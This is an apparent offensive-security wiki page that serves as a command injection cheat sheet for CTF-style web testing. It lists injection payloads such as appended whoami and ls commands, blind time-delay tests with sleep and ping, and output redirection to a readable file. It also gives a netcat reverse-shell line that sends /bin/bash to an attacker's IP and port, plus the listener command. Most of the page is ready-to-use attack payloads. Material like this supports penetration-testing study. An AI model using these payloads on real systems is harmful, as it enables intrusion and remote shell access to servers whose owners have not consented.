LOGO
OFFENSIVE | DEFENSIVE | WIKI | ABOUT

[COMMAND INJECTION / RCE]



GENERAL INFORMATION DESCRIPTION: Collection of different test to confirm the vulnerability, this can be reflected in browser sometimes. NOTE: Manual inspection is needed, source code, headers, behavior, etc. You can use variants of symbols to pipe and add more commands to retrieve content. [ ; or & or && and | or || ] C1: ';whoami;# C2: ';which php;# C3: 1|whoami SAMPLE: /?q='whoami' | | NOTE: If possible, try any command to get some kind of reverse shell! For that check what technologies are present, change the technology to validate. [C2] In a CTF style, it is pretty common to see a web page with some functionality, maybe connectivity tests or log information. Things to check: 1. inpunt fields without proper validation ? 2. any known functionality ? PING, DNS, etc 3. is the action providing some results ? How to test: 1. use the ";" to add more commands to see if the output reflects what you are doing. SAMPLE PING SCENARIO SHOWING DIR CONTENT: action=ping&ip_address=10.12.180.20;ls&submit=Action 2. start enumeration and read files to move. ::: GENERATE A SHELL C1: && nc -vn IP_ADDR PORT -e /bin/bash NOTE: Remember to set up a listener, "nc -lvp PORT" REVERSE SHELL | (payloadallthethings)
BLIND COMMAND INJECTION NOTE: It will be more related to behavior, similar to blind-sqli. Content in browser, cookies, etc.
COMMON ATTEMPTS ::: TIME DELAY 1. Identify the vulnerable parameter. 2. Attempt different tests on each field. [encode payloads] C1: /?q='sleep 10' C2: & sleep 10 # C3: x||ping+-c+10+127.0.0.1|| | | ::: OUTPUT REDIRECTION 1. Identify the vulnerable parameter. 2. Find the path with necessary rights to write output data. 3. Navigate to the path and load the file to check results. C1: ||whoami>/path/to/file/output.txt|| After output completed, you can read the file invoking the name, SAMPLE: /temp?filename=output.txt

©® - Since 2023